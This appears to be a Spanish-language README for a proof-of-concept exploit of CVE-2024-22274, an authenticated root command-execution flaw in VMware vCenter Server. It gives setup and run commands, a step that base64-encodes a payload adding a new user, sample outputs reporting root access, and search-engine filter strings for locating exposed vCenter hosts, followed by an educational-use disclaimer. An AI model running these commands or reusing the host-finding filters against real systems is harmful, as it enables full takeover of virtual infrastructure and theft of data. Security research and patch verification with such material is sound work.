
PoC - Ejecución remota de código autenticada en VMware vCenter Server (Exploit)
Los componentes de la API «com.vmware.appliance.recovery.backup.job.create» y «com.vmware.appliance.recovery.backup.validate» son vulnerables a un ataque de inyección de flags que puede aprovecharse para ejecutar comandos arbitrarios como usuario root en el sistema objetivo.
[!NOTE] Para que funcione este exploit PoC, debes tener credenciales válidas e iniciar sesión en el shell de VMware vCenter Server a través de SSH. El usuario debe tener el rol "admin", tal y como se especifica en el archivo
vcenter_creds.txt.
$ git clone https://github.com/l0n3m4n/CVE-2024-22274-RCE.git
$ cd CVE-2024-22274-RCE
$ python3 -m venv venv && source venv/bin/activate
$ pip install -r requirements.txt
Ejecuta o modifica
user2base64.shpara codificar en base64 el nuevo usuario añadido y automáticamente crearápayload.txt
$ bash user2base64.sh
Payload has been encoded to base64, saved payload.txt


$ python3 CVE-2024-22274-RCE.py -t 192.168.56.103 -P 22 -p payload.txt -c vCenter_creds.txt
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output:
uid=0(root) gid=0(root) groups=0(root)
[+] Exploitation successful: You have root access.
[+] Finished executing commands on 192.168.56.103
Este ejemplo significa que te estás conectando, pero el payload no está configurado o cargado correctamente. Consulta el PDF del PoC para obtener información más detallada.
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output:
No privileges escalation detected.
[+] Exploitation failed: Root access not obtained.
[+] Finished executing commands on 192.168.56.103
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[-] Error: Username or password not found in configuration file.
Comprueba la dirección del host y las credenciales.
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[-] Error: [SSH Error] Connection to 192.168.56.103 failed.
"VMware vCenter", Filtro: services.port: 443 AND tags: "VMware"title="VMware vCenter", Filtro: port="443" && title="VMware vCenter""VMware vCenter", Filtro: port:443 "VMware vCenter"Este exploit PoC no será efectivo si no entiendes cómo interpretar el script, ya que ha sido modificado intencionalmente para evitar que los "script kiddies" simplemente lo copien y ejecuten sin comprensión. VMware vCenter Server es un componente crítico en la gestión de entornos virtualizados; si alguien accede a él, puede obtener el control total sobre la infraestructura virtual y exfiltrar datos sensibles. Este PoC está diseñado para quienes ya tienen un pequeño nivel de conocimiento técnico y pueden usarlo correctamente; por lo tanto, si eres un script kiddie que busca causar disrupción sin entender las implicaciones, este exploit no te será útil.
Esta herramienta se proporciona únicamente con fines educativos y de investigación. El creador no asume ninguna responsabilidad por el mal uso o los daños causados por la herramienta. Crear un issue